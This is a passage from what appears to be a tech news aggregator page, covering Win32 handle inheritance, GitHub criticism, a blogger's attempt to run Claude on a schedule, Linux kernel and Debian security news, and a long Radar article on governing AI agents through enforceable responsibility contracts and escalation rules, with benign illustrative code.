I just want a cascading menu of stuff I can run and don’t want my launcher to make network requests, but alas, I guess I’m old.

Anyway, I don’t know enough about the intricacies of how modern processors work to make any statements about how this affects battery life, but instinctively, you’d think this would not exactly be conducive to it. I also wonder if this will trigger a lot of laptops to spin up their fans whenever you open the Start menu, because the few seconds your processor goes full tilt raise its temperature just enough to make that happen. Once this new feature comes out of testing and is generally available, I’d be quite interested in seeing battery tests, as well as comparisons to other operating systems to see how it fares.

22:07

GitHub is sinking [OSnews]

Microsoft acquired GitHub and applied their unique brand of enshittification. Amongst their achievements was the spawning of the Copilot circle of hell. Now they’re effectively DDoSing themselves with slop. I won’t dwell on what else went wrong. I don’t know and I don’t care. GitHub is impressively bad now. It’s embarrassing. Shameful.

↫ David Bushell

Luckily, there’s really very little in the form of lock-in with GitHub, unless you really value your stars or whatever. There are countless alternatives, and if you’re a programmer, it’s probably absolutely trivial for you to run your own instance of any of the various available forges. If you’re still on GitHub, you should really be thinking about, and planning for, leaving, as it seems it’s circling the drain.

17:28

Additional notes on controlling which handles are inherited by Create­Process [The Old New Thing]

Some time ago, I wrote about programmatically controlling which handles are inherited by new processes in Win32 by using the PROC_THREAD_ATTRIBUTE_HANDLE_LIST to limit exactly which handles are inherited. That way, when you create a new process, you have precise control over which handles get inherited and don’t accidentally inherit handles created by unrelated components in your process.

A colleague of mine pointed out that you still have the reverse problem: since handles must be marked as inheritable for them to participate in PROC_THREAD_ATTRIBUTE_HANDLE_LIST, if another thread calls CreateProcess with bInheritHandles = TRUE but without using PROC_THREAD_ATTRIBUTE_HANDLE_LIST, then that new process will accidentally inherit all of your handles.

This problem could have been avoided if the PROC_THREAD_ATTRIBUTE_HANDLE_LIST allowed you to include non-inheritable handles, in which case they would be non-inheritable by normal Create­Process but inheritable if explicitly opted back in. But alas, that’s not how it was designed.

Instead, you can create a helper process. All this helper process does is wait for the main process to exit, and then exit itself.

// Block until the main process exits, then exit the helper too.
WaitForSingleObject(hMainProcess, INFINITE);
ExitProcess(0);

This process doesn’t sound like it’s doing anything useful, and it’s not. But what makes it useful is not what it’s doing but rather what is done to it.

The components in the main process create their handles as non-inheritable. When they want to create a process with specific inherited handles, they duplicate the desired handles into the helper process (as inheritable), and then build a PROC_THREAD_ATTRIBUTE_HANDLE_LIST that lists those duplicates as the handles to inherit. They also use PROC_THREAD_ATTRIBUTE_PARENT_PROCESS to specify that the helper process is the parent process that the handles should be inherited from. Then they pass those thread attributes to CreateProcess, and the new process will inherit exactly those handles. Finally, they clean up by closing the handles in the helper process with the help of DuplicateHandle and DUPLICATE_CLOSE_SOURCE.

Notice that multiple threads can simultaneously be operating on the helper process in this way, so you need only one helper process to service all your handle-inheritance-control needs.

This avoids the accidental inheritance problem because the handles that belong to the components in the main process are still marked non-inheritable, so any other code in the main process that does a Create­Process will not inherit them.
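The Win32 flow above is hard to demonstrate runnably outside Windows, but the underlying idea (inheritable-by-default is dangerous, so keep everything non-inheritable and opt specific handles back in per child) has a close POSIX analogue in Python's subprocess module, where descriptors are closed in the child by default (close_fds=True) and pass_fds opts chosen ones back in. A minimal sketch of that analogue, not the Win32 mechanism itself:

```python
import os
import subprocess
import sys

# Create a pipe; in Python 3.4+ these fds are non-inheritable by default,
# the POSIX analogue of non-inheritable Win32 handles.
r, w = os.pipe()

# Spawn a child that reads from the one descriptor we chose to pass.
# pass_fds opts the read end back in, much as PROC_THREAD_ATTRIBUTE_HANDLE_LIST
# opts specific handles in on Windows; every other fd stays closed in the child.
child = subprocess.Popen(
    [sys.executable, "-c",
     f"import os; print(os.read({r}, 64).decode(), end='')"],
    pass_fds=(r,),
    stdout=subprocess.PIPE,
)

os.write(w, b"hello from the parent")
os.close(w)
out, _ = child.communicate()  # out == b"hello from the parent"
```

Unlike Win32, POSIX needs no helper process here, because the inheritable flag is applied per-spawn rather than being a property raced over by concurrent CreateProcess callers.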

The post Additional notes on controlling which handles are inherited by CreateProcess appeared first on The Old New Thing.

16:28

Realtime Claude still evading me! [Scripting News]

A while back I was asking Claude (privately) if we could have it monitoring the messages posted to an app I'm working on. I wanted it to save them in a certain way, have it watch for messages that begin with //claude and maybe act on them somehow. I mostly just wanted to see if I could create a pipe and what its limits would be.

I asked what the max frequency is and was told it was 1 minute, meaning it would start a thread running Claude that would initialize, read the file, process any new items, and then shut down. Barely enough to be useful (where we live we like notification within a second), but I went ahead; at least it'll be a thought-provoking demo.

So I wrote the software. Not much to it, a Node app that's hooked up to FeedlandSocket, and when it sees a message from me, it appends it to a JSONL file that Claude is watching. At most one minute later it wakes up and sees the new stuff and acts on it.

So I'm right there, it's all working, the JSONL file is being saved in a public place, and when I ask it to start listening to my JSONL messages I learn that the max frequency is one hour, rendering my work useless. This has happened before, btw.

I asked what about all the "agentic" stuff they hype so much, how do I do that?? I can't?? What?? Somehow I have trouble believing they're all telling such a big lie. I wonder if Claude understands its own architecture.

Dave: "What is all this hype about agentic stuff. Every time I try to do something I hit a wall like this."

Claude: "The pitch is 'agents that run on their own'; the reality you just hit is a one-hour floor on the only scheduling path the tooling actually exposes. That's not agency, that's a batch job with extra steps. The honest read: the cloud-side scheduler is built around long-running, infrequent tasks (digest emails, nightly reports) because each run spins up a fresh sandboxed session, which is expensive. Anything that wants to react quickly to a stream of incoming items -- which is what your app actually is -- doesn't fit that model. A plain local cron on some server running every minute would do the job today and cost nothing."

I edited Claude's response so as not to reveal code names for products. ;-)

A silver lining -- I had never heard of JSONL, but it sounds pretty useful, so even if I can't hook up to Claude in realtime, I can start using JSONL now, which I will.
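For reference, JSONL ("JSON Lines") is just one JSON object per line of a text file, which is what makes the append-and-poll pattern Dave describes so easy. A minimal Python sketch of that pattern (the file name and message fields are hypothetical, and Dave's actual app is in Node):

```python
import json

LOG = "messages.jsonl"  # hypothetical file name

def append_message(msg: dict) -> None:
    # JSONL: serialize one JSON object per line and append it.
    with open(LOG, "a", encoding="utf-8") as f:
        f.write(json.dumps(msg) + "\n")

def read_new(offset: int):
    # A poller remembers the byte offset it has read up to and only
    # processes lines added since -- the watcher waking up on a schedule.
    with open(LOG, "rb") as f:
        f.seek(offset)
        data = f.read()
    items = [json.loads(line) for line in data.splitlines() if line.strip()]
    return items, offset + len(data)

append_message({"user": "dave", "text": "//claude summarize today"})
items, offset = read_new(0)        # first poll sees the new message
items2, offset2 = read_new(offset)  # no new lines yet: empty list
```

Whether the poller runs every second or every hour is then purely a scheduling question; the file format doesn't care.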

Comments, stories, suggestions -- here.

16:07

Stenberg: Mythos finds a curl vulnerability [LWN.net]

Daniel Stenberg has published a lengthy article on his thoughts on Anthropic's Mythos, which the company decided was too dangerous for wide public release.

My personal conclusion can however not end up with anything else than that the big hype around this model so far was primarily marketing. I see no evidence that this setup finds issues to any particular higher or more advanced degree than the other tools have done before Mythos. Maybe this model is a little bit better, but even if it is, it is not better to a degree that seems to make a significant dent in code analyzing.

This is just one source code repository and maybe it is much better on other things. I can only tell and comment on what it found here.

But allow me to highlight and reiterate what I have said before: AI powered code analyzers are significantly better at finding security flaws and mistakes in source code than any traditional code analyzers did in the past. All modern AI models are good at this now. Anyone with time and some experimental spirits can find security problems now. The high quality chaos is real.

15:21

Two stable kernels with Dirty Frag fixes [LWN.net]

Greg Kroah-Hartman has released the 7.0.6 and 6.18.29 stable kernels with Hyunwoo Kim's patch for the second vulnerability (CVE-2026-43500) reported with Dirty Frag and Copy Fail 2. All users are advised to upgrade.

[$] Providing 64KB base pages with 4KB kernels, two different ways [LWN.net]

Some CPU architectures are able to run with a number of different base-page sizes; using a larger size can often result in better performance at the cost of increased memory use. Other architectures are more limited. At the 2026 Linux Storage, Filesystem, Memory Management, and BPF Summit, two sessions in the memory-management track explored options for letting processes run with 64KB page sizes when the underlying kernel does not. The first was focused on letting each process have its own page size, while the second concerned bringing 64KB pages to x86 systems.

14:56

Link [Scripting News]

Members of the WordPress community. Monday morning is a good time to check out WordPress News via FeedLand at wp.feedland.org. You can also subscribe to the list of feeds this site follows in your own feed reader, and if you have a WordPress news site, please post the URL here so we can send readers to your blog too. I think there are a lot of would-be bloggers out there that need a slight kick in the pants to get going. I'm happy to provide readers if you provide the ideas. There's a lot of power in WordPress that no one knows about. Let's help other users and developers find the good stuff. If you have questions or suggestions, here's a new thread on GitHub.

Link [Scripting News]

It would be great if Beeper supported RSS in and out. It would help encourage other messaging services to do the same, and all of a sudden we'd have lots of easy interop instead of lots of really iffy interop. If they want to do it, I'd help, for free. Just to help things flow better on the messaging web, because we reallllly need help there.

14:35

Debian to require reproducible builds [LWN.net]

Paul Gevers has slipped an interesting bit of news into a "bits from the release team" message:

Aided by the efforts of the Reproducible Builds project, we've decided it's time to say that Debian must ship reproducible packages. Since yesterday, we have enabled our migration software to block migration of new packages that can't be reproduced or existing packages (in testing) that regress in reproducibility.

As Gioele Barabucci pointed out, "reproducible" in this sense is limited to building within an instance of Debian's build environment, which is a tighter requirement than is normally used. It is still a big step forward for reproducible builds.

Security updates for Monday [LWN.net]

Security updates have been issued by AlmaLinux (corosync, freeipmi, kernel, and kernel-rt), Debian (corosync, firefox-esr, kernel, lcms2, libpng1.6, linux-6.1, php8.2, php8.4, postorius, pyjwt, and tor), Fedora (dotnet10.0, exim, gnutls, kernel, nextcloud, nodejs22, php, proftpd, prosody, python-pulp-glue, python-requests, rclone, and SDL3_image), Mageia (firefox, nss, rootcerts, openvpn, thunderbird, and vim), Oracle (corosync, freeipmi, gstreamer1-plugins-bad-free, gstreamer1-plugins-base, and gstreamer1-plugins-good, kernel, libpng, and mingw-libtiff), Slackware (kernel and mozilla), SUSE (build, product-composer, c-ares, cairo, copacetic, distribution, firefox, firefox-esr, frr, glibc, go1.25, google-cloud-sap-agent, iproute2, java-11-openj9, java-17-openj9, java-17-openjdk, java-1_8_0-openj9, java-21-openj9, java-21-openjdk, java-25-openjdk, kernel, libexif-devel, libpcp-devel, libtpms, libtree-sitter0_26, Mesa, micropython, mozjs128, nginx, opencc, openCryptoki, php-composer2, podman, postfix, python-pytest, python311-Django, python311-Django4, redis, semaphore, strongswan, terraform-provider-aws, terraform-provider-azurerm, terraform-provider-external, terraform-provider-google, terraform-provider-helm, terraform-provider-kubernetes, terraform-provid, tor, valkey, vim, and wireshark), and Ubuntu (linux-nvidia-tegra, linux-raspi, linux-raspi-5.4, and nasm).

14:07

From Capabilities to Responsibilities [Radar]

Human-in-the-Loop becomes an operational bottleneck

In my previous article, “The Missing Layer in Agentic AI,” I argued that AI agents need a deterministic execution kernel—a privileged “Kernel Space” that validates every proposed action before it touches the real world. That article focused on what happens at the execution boundary: idempotency, JIT state verification, and DFID-correlated telemetry. But establishing that boundary immediately raises a natural question: who exactly is crossing it, and under what authority?

The focus here is on a narrower and more demanding class of systems. We are not looking at RAG chatbots, research copilots, or lightweight assistants that only retrieve and summarize information. The target is high-stakes agentic systems: systems allowed to mutate external state by moving money, changing infrastructure, or modifying critical records. The approach presented here is not a general-purpose agent framework; it is an enforcement pattern for side-effectful systems.

High-stakes AI systems must be designed around responsibilities, not capabilities.

The industry’s current answer is unsatisfying: Human-in-the-Loop (HITL). In development environments and low-frequency pipelines, routing uncertain decisions to a human can be defensible. In production systems operating at scale—dozens of agents, hundreds of decisions per hour—it becomes the Scalability Trap.

Figure 1: The Human-in-the-Loop (HITL) model degrades into an operational bottleneck, substituting true governance with alert fatigue and unverified execution.

Operationally, the failure is simple. An agent flags a decision for review. A human approves it. Then another arrives, then dozens more. The queue grows. The human begins clicking through. They stop reading the JSON payloads. They click “Approve” because the backlog is piling up, the meeting starts in ten minutes, and nothing has gone catastrophically wrong yet. That is alert fatigue: governance degrades into manual throughput management. The problem is not human weakness; it is governance-layer technical debt created by routing too many binary decisions through a manual queue.

Tyler Akidau captured the broader issue in “Posthuman: We All Built Agents. Nobody Built HR.”, echoing Tim O’Reilly’s call for the missing protocols of the AI era: the industry has invested heavily in agent capability, but far less in the infrastructure that governs authority, constraint, and accountability.

Scalable AI does not mean hiring more reviewers to supervise more bots. It means changing the governance model entirely. The scalable alternative is Governance by Exception: Humans design policy, the runtime enforces it, and only truly exceptional cases are escalated.

From capabilities to responsibilities—what a responsibility-oriented agent actually is

The dominant framing in enterprise AI asks a single question: What can this agent do? What tools does it have? What APIs can it call? This is the capabilities frame. It is natural, it is intuitive, and in production systems it is the wrong frame entirely.

In organizational design, a role is stable and assigned. Much like role-based access control (RBAC) in traditional software, it defines what someone is authorized to do, independent of the tasks they happen to be executing. We cannot dictate how a person thinks, but we can strictly bound what they are permitted to do. A responsibility statement makes that boundary explicit. In software, we somehow forgot this distinction, hoping that raw intelligence—better models, tighter prompts, improved alignment—would be a sufficient guardrail.

The difference becomes clearer across some enterprise domains:

  • Finance: A capability is “can execute equity trades.” A responsibility is “authorized to execute up to $50,000 per order, in highly liquid equities only, with a maximum daily drawdown of 2%.”
  • Healthcare Operations: A capability is “can reschedule patient appointments.” A responsibility is “authorized to re-book non-critical outpatient visits within a 14-day window, strictly avoiding specialist double-booking.”
  • Supply Chain: A capability is “can reroute freight.” A responsibility is “authorized to redirect non-hazardous cargo up to a maximum SLA penalty budget of $5,000.”

In systems where agents touch money, medical records, or physical logistics, the gap between these two statements is the gap between a demo and a production deployment.

The current paradigm often handles this gap with prompts. Give the LLM an API key, tell it to “be careful with position sizing,” and hope alignment holds under adversarial inputs, unusual market conditions, and the seductive logic of edge cases. In low-risk contexts that may be tolerable. In high-stakes systems with real-world side effects, it is not a sufficient control surface.

This distinction is not new. Distributed systems solved a similar problem decades ago.

Carl Hewitt’s Actor model—introduced in 1973—gives us a useful foundation. An Actor is an independent computational entity with its own state, its own behavior, and its own messaging interface. Actors do not share state. They communicate only by passing messages. Crucially, an Actor’s behavior is bounded—defined by what messages it accepts, not by an open-ended capability set.

The Responsibility-Oriented Agent (ROA) does not invent a new distributed-systems primitive. Instead, it composes proven patterns—bounded actors, RBAC-style authority envelopes, audit trails, and execution-boundary validation—around an unpredictable LLM core. In truth, ROA is closer to a decision actor than a full computational actor: It maintains its own internal state but does not directly mutate the external world. Within a stable role, a fixed mission, and a machine-enforceable contract, it receives business events, reasons over relevant context, and emits a PolicyProposal for the Runtime to validate.

Its job is epistemic, not executive. It explains the situation and structures intent. But unlike traditional Actors, an ROA agent is defined by strict separation of concerns. In its reference form, credentials reside outside the agent’s reach. It opens no direct execution channel to external systems and writes no state by itself. An ROA agent may use tools to gather context (read-only operations within its sandbox, like querying a knowledge base), but authority for state-mutating actions remains downstream of deterministic validation and execution gates. The only state-changing step attributable to the agent is emit_policy_proposal()—a structured, typed claim that it wants the system to do something. ROA shapes the form of intent; the Runtime decides whether that intent is allowed to become action.

This separation is the architecture’s most important property. Five engineering pillars define what it means in practice—each addressing a different failure mode at the reasoning–execution boundary—and together they transform an LLM from a probabilistic tool into a governable, accountable system component.

To make this concrete, imagine an underwriting agent on the London commercial market receiving a property submission. It reads the documents and produces an Explain narrative. It then emits a PolicyProposal for a quote. But the property value is £15M and its contract caps authority at £10M. The proposal reaches the Kernel, where the Runtime evaluates the YAML contract deterministically, rejects execution, and transitions the flow to ESCALATED. The senior underwriter is no longer reviewing every £2M submission. They are pinged only for this specific £15M exception. That is Human-Over-The-Loop in one decision.

The engineering pillars of an ROA

Pillar 1: Responsibility contract—authority encoded in code

If role defines the class of decisions the agent may handle, the Responsibility Contract defines the hard boundaries of that authority. The agent’s authority envelope is not a prompt. It is a versioned, machine-readable contract registered with the Agent Registry—the Kernel’s single source of truth for agent identity. A key property applies here: Prompts are suggestions. Code is enforcement. A prompt saying “do not exceed $10,000 per trade” can be creatively reinterpreted by a sufficiently motivated model or overridden by a carefully crafted prompt injection. A contract field max_order_size_usd: 10000.0 validated by deterministic runtime code is materially harder to bypass than a natural-language instruction. In the reference architecture, contracts are deployed out of band—agents do not self-register and do not read or modify their own contract.

There is a second-order consequence of this design that is easy to overlook: role definition automatically scopes the data context the agent requires. If an underwriting agent is contractually limited to HOME_STD and HOME_PLUS policy types in the LOW and MEDIUM risk tiers, the Context Compiler—which assembles the agent’s working snapshot before each inference call—needs to supply only the signals relevant to those dimensions. Market data for commercial property, flood zone statistics for excluded risk tiers, and regulatory data for other product lines are simply not in scope. The context is deterministically narrowed by the contract.

This matters for a concrete LLM engineering reason. In practice, models often become less reliable as their working context expands, including the class of effects practitioners describe as Lost in the Middle. A tightly scoped role is not just a governance convenience; it is an architectural mechanism for keeping the agent’s working context small enough to reason over reliably. A general-purpose agent handed an unconstrained context window of everything possibly relevant is more likely to degrade than a contract-bounded agent operating in a defined domain.

In the insurance underwriting sample, that Responsibility Contract could be configured like this:

agents:
  - agent_id: "underwriter_agent"
    version: "1.0.0"
    created_by: "compliance@example.com"
    created_at: "2025-02-17T10:00:00Z"
    mission: |
      You are an insurance underwriter. Analyze the client application and propose
      a policy. Base premium on Total Insured Value (TiV) at ~2% of TiV, capped at max_tiv.
      NEVER propose for Fireworks or CryptoMining industries - these are prohibited.
    contract:
      role: EXECUTOR
      max_tiv: 3000000
      prohibited_industries: ["Fireworks", "CryptoMining"]
      escalate_on_uncertainty: 0.65
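The enforcement half of such a contract is deliberately boring code. Here is a minimal sketch of how a deterministic Runtime might evaluate a proposal against the contract fields above (`Contract` and `validate` are illustrative names, not part of a published API; the field names follow the YAML sample):

```python
# Sketch: deterministic contract enforcement. No LLM is involved here --
# only plain comparisons against versioned contract fields.
from dataclasses import dataclass

@dataclass(frozen=True)
class Contract:
    max_tiv: float
    prohibited_industries: frozenset
    escalate_on_uncertainty: float

def validate(contract: Contract, proposal: dict) -> tuple:
    """Return (verdict, reason) for a proposal's binding fields."""
    if proposal["industry"] in contract.prohibited_industries:
        return "REJECTED", "prohibited industry"
    if proposal["total_insured_value"] > contract.max_tiv:
        return "ESCALATED", "exceeds delegated max_tiv"
    if proposal["confidence"] < contract.escalate_on_uncertainty:
        return "ESCALATED", "below confidence threshold"
    return "APPROVED", "within contract"

contract = Contract(3_000_000, frozenset({"Fireworks", "CryptoMining"}), 0.65)
print(validate(contract, {"industry": "Commercial Property",
                          "total_insured_value": 2_750_000,
                          "confidence": 0.81}))
# -> ('APPROVED', 'within contract')
```

The point of the sketch is the asymmetry: a prompt can be argued with, but `proposal["total_insured_value"] > contract.max_tiv` cannot.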

Pillar 2: Mission—The North Star

Mission is immutable at runtime. If the Responsibility Contract defines what the agent may do, Mission defines what it is trying to optimize within those boundaries. This distinction is operationally important: the Contract defines the admissible action space, while the Mission defines the ranking logic inside that space. Contract answers may; Mission answers should. Two agents can share the same authority envelope and still optimize for different business outcomes, as long as both remain inside the same hard boundary.

In the ROA architecture, Mission is a deployment artifact with two surfaces: a human-readable mission_statement used by the agent as a reasoning guide, and a machine-verifiable mission_context_hash used by the Runtime to enforce integrity.

mission_statement: "Minimize SLA penalties in logistics rerouting. Prioritize low-cost carriers."
mission_context_hash: "sha256:a3f9b2c1..."   # Kernel-computed at deployment time, strictly immutable

The deterministic Kernel does not interpret the mission_statement text. The agent uses that text internally as a reasoning guide, while the Runtime enforces mission integrity by comparing the mission_context_hash in the proposal with the immutable value registered in the Agent Registry. If prompt injection or runtime drift changes the agent’s objective, the hash no longer matches and the proposal is rejected without semantic interpretation. The hash is one implementation; the requirement is deterministic integrity at the boundary.
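A hash-based integrity check of this kind is a few lines of deterministic code. The sketch below assumes SHA-256 over the mission text, as the `sha256:` prefix in the sample suggests; the helper names are illustrative:

```python
# Sketch: mission integrity via a content hash. The Kernel stores the hash
# at deployment time and compares it at proposal time -- it never interprets
# the mission text semantically.
import hashlib

def mission_hash(mission_statement: str) -> str:
    return "sha256:" + hashlib.sha256(mission_statement.encode("utf-8")).hexdigest()

registered = mission_hash("Minimize SLA penalties in logistics rerouting. "
                          "Prioritize low-cost carriers.")

def check_integrity(proposal_hash: str) -> bool:
    # A plain string comparison: drift or injection changes the hash.
    return proposal_hash == registered

# A drifted objective (e.g. after prompt injection) no longer matches:
drifted = mission_hash("Maximize rerouting volume regardless of cost.")
print(check_integrity(registered), check_integrity(drifted))  # True False
```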

A Mission is defined at deployment and evolves only through a deliberate, version-controlled update to the contract—not through prompt tweaking, user feedback, or runtime negotiation. In practical terms, Mission keeps optimization policy under change control. An agent whose mission drifts with each conversation is not a durable production actor; it is a session.

Pillar 3: Epistemic isolation—claims, not commands (Explain versus Policy)

If Contract defines the boundary and Mission defines the objective, Epistemic Isolation defines the only acceptable form of output. An ROA agent interacts with the world exclusively through structured, typed PolicyProposal artifacts. The agent’s output is an untrusted claim—an assertion that it wants the system to do something—and the Runtime treats it precisely as such.

This property is what makes the ROA + Runtime pattern materially more resistant to prompt injection. If an injection bypasses the LLM’s reasoning guardrails, the corrupted output still arrives as a typed proposal carrying an agent_id. If the proposal asks to transfer funds, but the agent’s contract lacks that authority, the Runtime rejects it with RBAC_DENIED. Security derives from deterministic enforcement at the execution boundary, not from trusting LLM alignment.

To cleanly bridge probabilistic thinking to deterministic claims, ROA agents produce decisions through a structured internal workflow with a strict separation between Explain and Policy:

  1. Explain: Agent interprets context and articulates the situation in natural language (e.g., “Flood risk score 3/10...“). This creates a narrative artifact for human auditors. It is never parsed for execution logic.
  2. Policy: Agent formulates a structured PolicyProposal carrying the execution-relevant fields the Runtime can validate deterministically. In the underwriting sample, that looks like this:
proposal = PolicyProposal(
  total_insured_value=2_750_000,
  premium=55_000,
  industry="Commercial Property",
  justification="TiV remains below delegated max_tiv and no prohibited industry indicators were found.",
  confidence=0.81,
)

The binding fields (total_insured_value, premium, industry) drive deterministic validation, while justification and confidence remain observability metadata for audit and escalation.

That separation is what makes the evidence model clean: The narrative remains human-readable, the policy remains machine-enforceable, and both can be bound to the same decision lineage without allowing free text to leak into execution.
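One way to make the Explain/Policy split mechanical is a typed proposal whose binding fields can be separated from narrative metadata by construction. This is a sketch under the field names used above; the real schema is defined by the project, and `binding_fields` is an illustrative helper:

```python
# Sketch: a typed proposal where binding fields and observability metadata
# are structurally distinct, so free text can never leak into validation.
from dataclasses import dataclass

@dataclass(frozen=True)
class PolicyProposal:
    # Binding fields: the only values the deterministic validator sees.
    total_insured_value: float
    premium: float
    industry: str
    # Observability metadata: audit and escalation only, never executed on.
    justification: str
    confidence: float

def binding_fields(p: PolicyProposal) -> dict:
    """Project out the execution-relevant fields; narrative is excluded."""
    return {"total_insured_value": p.total_insured_value,
            "premium": p.premium,
            "industry": p.industry}

p = PolicyProposal(2_750_000, 55_000, "Commercial Property",
                   "TiV remains below delegated max_tiv.", 0.81)
print(sorted(binding_fields(p)))
# -> ['industry', 'premium', 'total_insured_value']
```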

Pillar 4: Epistemic longevity—memory across decision cycles

Once the agent has a stable role, a fixed mission, and a disciplined output interface, continuity across decision cycles becomes meaningful. This is the pillar most absent from practical implementations—and the one most responsible for a specific class of production failures: the infinite rejection loop.

ROA agents are not stateless inference calls. They are long-lived entities that maintain a decision trajectory across multiple cycles—a Kernel-managed record of prior proposals, their validation outcomes, and the business consequences of those decisions.

The same scoping logic that constrains authority also determines whether memory is meaningful. A long-lived agent operating within a stable role accumulates history from the same class of decisions under similar constraints—past actions and their outcomes are genuinely causally related. A general-purpose assistant handed unrelated tasks may still notice patterns, but those correlations are rarely operationally reliable. Focused responsibility is what separates signal from coincidence in the agent’s memory.

The failure mode this prevents has a name: decision amnesia. Without longevity, the agent repeats the same rejected intent because the rejection is not part of the next decision cycle.
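A minimal sketch of the mechanism that breaks the loop: a Kernel-managed trajectory that records verdicts and is consulted before the next cycle. All names here are illustrative, not the project's actual API:

```python
# Sketch: Epistemic Longevity as a bounded decision trajectory. Prior
# rejections become part of the next cycle instead of being forgotten.
from collections import deque

class DecisionTrajectory:
    def __init__(self, maxlen: int = 50):
        self._history = deque(maxlen=maxlen)  # bounded, Kernel-managed record

    def record(self, proposal_key, verdict: str, reason: str) -> None:
        self._history.append((proposal_key, verdict, reason))

    def rejected_before(self, proposal_key) -> bool:
        """Has this exact intent already been refused by the Runtime?"""
        return any(k == proposal_key and v == "REJECTED"
                   for k, v, _ in self._history)

traj = DecisionTrajectory()
traj.record(("reroute", "carrier_X"), "REJECTED", "SLA budget exceeded")
# Next cycle: the repeated intent is recognized rather than retried blindly.
print(traj.rejected_before(("reroute", "carrier_X")))  # True
```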

With and without Epistemic Longevity

Pillar 5: Decision telemetry—immutable accountability

Every PolicyProposal carries a Decision Flow ID (dfid) that binds it to the full decision context. Rather than dumping unstructured logs, this constructs a reconstruction primitive—a relational trace connecting:

  • The Input: The exact Context Snapshot (T0) the agent reasoned against.
  • The Validation: The outcome evaluated against the Responsibility Contract.
  • The Outcome: The final execution receipt.

This correlated record enables answering “why did this agent do this, at this specific moment, against what state of the world?” using a standard SQL join across the full decision lifecycle. In higher-assurance deployments, the same structured telemetry can be wrapped into a cryptographically signed proof-carrying intent, allowing independent verification of the decision artifact without asking anyone to trust mutable text logs—exactly the direction high-risk compliance regimes such as the EU AI Act are pushing toward.

But structured decision telemetry does more than support daily postmortems. Every decision becomes a structured relational record bound by DFID—the same foundation that makes macroscopic failures like Agent Drift detectable before they compound silently across the fleet.
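The "standard SQL join" claim above can be made concrete with a toy schema keyed on the DFID. The table and column names below are illustrative, not the project's actual schema:

```python
# Sketch: DFID-correlated telemetry. Three relational tables share the
# dfid key, so one join reconstructs input, validation, and outcome.
import sqlite3

db = sqlite3.connect(":memory:")
db.executescript("""
CREATE TABLE context_snapshots (dfid TEXT PRIMARY KEY, snapshot TEXT);
CREATE TABLE validations      (dfid TEXT PRIMARY KEY, verdict  TEXT);
CREATE TABLE executions       (dfid TEXT PRIMARY KEY, receipt  TEXT);
""")
db.execute("INSERT INTO context_snapshots VALUES ('dfid-001', '{...T0 state...}')")
db.execute("INSERT INTO validations VALUES ('dfid-001', 'APPROVED')")
db.execute("INSERT INTO executions VALUES ('dfid-001', 'tx-9f2c')")

# "Why did this agent do this, against what state of the world?"
row = db.execute("""
    SELECT c.snapshot, v.verdict, e.receipt
    FROM context_snapshots c
    JOIN validations v ON v.dfid = c.dfid
    JOIN executions  e ON e.dfid = c.dfid
    WHERE c.dfid = 'dfid-001'
""").fetchone()
print(row)  # -> ('{...T0 state...}', 'APPROVED', 'tx-9f2c')
```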

Human-Over-The-Loop—autonomy at scale

The alternative to Human-in-the-Loop is not to remove the human, but to move the human from the execution loop to the design loop.

This is the Human-Over-The-Loop (HOTL) model. The human acts as a Policy Designer who defines and evolves the contract that governs decisions, while the system operates autonomously inside those boundaries. No approval queue. No review fatigue. Governance by Exception is the scalable model.

Figure 2: Human-Over-The-Loop shifts the human from the execution queue to the design loop. The agent runs autonomously within a deterministic contract; the human governs by defining that contract and intervening only on genuine exceptions.

Escalation Triggers. The system escalates only when the agent encounters a situation its contract does not authorize it to resolve alone:

  • Proposed action exceeds a contract authority limit
  • Agent confidence drops below escalate_on_uncertainty threshold
  • External API errors exceed a retry budget
  • No decision has been emitted within a configured inactivity window

When a trigger fires, the DecisionFlow enters ESCALATED state. The operator sees the WorkingContext, the PolicyProposal, and the reason for escalation, and can OVERRIDE, MODIFY, or ABORT. This is not an “Approve / Reject” queue; it is targeted intervention.

Escalation should not be understood as proof that the agent reliably knows what it does not know. LLMs are poor judges of their own uncertainty, so the architecture does not trust introspection. The escalate_on_uncertainty threshold is a useful heuristic, not a ground truth: the system forces escalation when declared confidence falls below the threshold, or when the proposal violates contract parameters the Kernel can evaluate deterministically. If the model produces a bad proposal with high confidence, the Runtime still blocks it. The agent may signal uncertainty; the Runtime decides whether that uncertainty matters.

Frozen Context + JIT. The operator reviews the proposal against the exact snapshot of the world the agent saw at T0, avoiding the TOCTOU (Time-of-Check to Time-of-Use) problem: The human audits the machine’s decision using exactly the data the machine saw.

But the world keeps moving. Hitting “OVERRIDE” at T1 does not blindly execute the action; it forces the proposal through the Runtime’s JIT (Just-In-Time) Verification gate. If reality has drifted beyond the contract’s Drift Envelope between T0 and T1, the Runtime rejects the override rather than executing a once-valid intent against stale state.
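A drift-envelope check can be as simple as bounded relative change on the monitored fields. The function, field names, and 2% tolerance below are all illustrative assumptions, not the project's definition:

```python
# Sketch: JIT verification gate. An override at T1 executes only if the
# monitored state has not drifted beyond the envelope since the T0 snapshot.
def within_drift_envelope(snapshot_t0: dict, state_t1: dict,
                          tolerance: float = 0.02) -> bool:
    """Reject stale intent if any monitored value moved more than `tolerance`."""
    for key, v0 in snapshot_t0.items():
        v1 = state_t1[key]
        if abs(v1 - v0) / abs(v0) > tolerance:
            return False
    return True

t0 = {"quote_price": 100.0, "exposure": 2_750_000.0}
print(within_drift_envelope(t0, {"quote_price": 101.0, "exposure": 2_750_000.0}))  # True
print(within_drift_envelope(t0, {"quote_price": 109.0, "exposure": 2_750_000.0}))  # False
```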

Contract Evolution. The right long-term response to a legitimate edge case is usually not repeated override, but contract change. If business reality shifts, the operator updates the Responsibility Contract and deploys a new version. The system adapts through version-controlled governance boundaries rather than prompt edits or fine-tuning.

Escalation Budget. Escalation is rate-limited by a token bucket per agent (for example, 3 escalations per hour). If an agent exhausts that budget, the Runtime transitions it to SUSPENDED, records the state change, and blocks new DecisionFlows until an operator intervenes. This prevents Escalation DDoS and contains runaway reasoning costs.
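The token-bucket budget mentioned above is a standard rate-limiting primitive. Here is a sketch using the "3 escalations per hour" example from the text; the class and method names are illustrative:

```python
# Sketch: per-agent escalation budget as a token bucket (3 per hour).
# When the bucket is empty, the Runtime would suspend the agent.
import time

class EscalationBudget:
    def __init__(self, capacity: int = 3, refill_per_sec: float = 3 / 3600):
        self.capacity = capacity
        self.tokens = float(capacity)
        self.rate = refill_per_sec
        self.last = time.monotonic()

    def try_escalate(self) -> bool:
        now = time.monotonic()
        # Refill proportionally to elapsed time, capped at capacity.
        self.tokens = min(self.capacity,
                          self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1:
            self.tokens -= 1
            return True
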